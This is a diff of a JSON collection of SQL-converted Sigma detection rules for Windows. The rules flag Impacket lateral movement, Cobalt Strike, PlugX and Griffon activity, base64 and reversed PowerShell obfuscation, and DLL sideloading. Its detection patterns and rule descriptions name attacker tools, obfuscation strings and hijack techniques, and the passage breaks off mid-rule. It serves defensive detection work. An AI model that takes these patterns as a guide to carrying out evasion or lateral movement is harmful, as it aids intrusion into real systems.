"attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", + "status": "experimental", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1059" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.initial_access", "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "status": "experimental", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": "test", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "status": "test", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 